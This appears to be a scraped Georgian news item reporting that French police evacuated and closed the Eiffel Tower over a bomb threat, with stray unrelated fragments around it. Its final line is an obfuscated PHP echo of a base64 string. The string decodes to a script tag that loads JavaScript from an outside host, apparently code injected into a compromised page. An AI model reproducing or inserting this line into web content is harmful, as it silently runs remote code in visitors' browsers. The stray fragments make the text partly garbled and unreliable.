celsiusi
ავერსი შნაიდერი

საფრანგეთის პოლიციაში აცხადებენ, რომ ბომბის არსებობის საფრთხის გამო, პარიზში, ეიფელის კოშკიდან მოქალაქეების ევაკუაცია განხორციელდა. ამის შესახებ ინფორმაციას „როიტერი“ ავრცელებს.

„მას შემდეგ, რაც ბომბის არსებობის საფრთხის გამო მოქალაქეების ევაკუაცია მოხდა, ეიფელის კოშკი საზოგადოებისთვის დაკეტილია“, – განაცხადეს საფრანგეთის პოლიციაში.

ამასთან, ფრანგული მედიის ცნობით, სტუმრების ევაკუაცია განხორციელდა სამივე სართულიდან, ასევე ეიფელის კოშკის მიმდებარე ტერიტორიიდან. ევაკუირებულია ერთ-ერთ სართულზე მდებარე რესტორანიც.

მომხდარის შესახებ სხვა დეტალები ჯერჯერობით უცნობია.

324
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");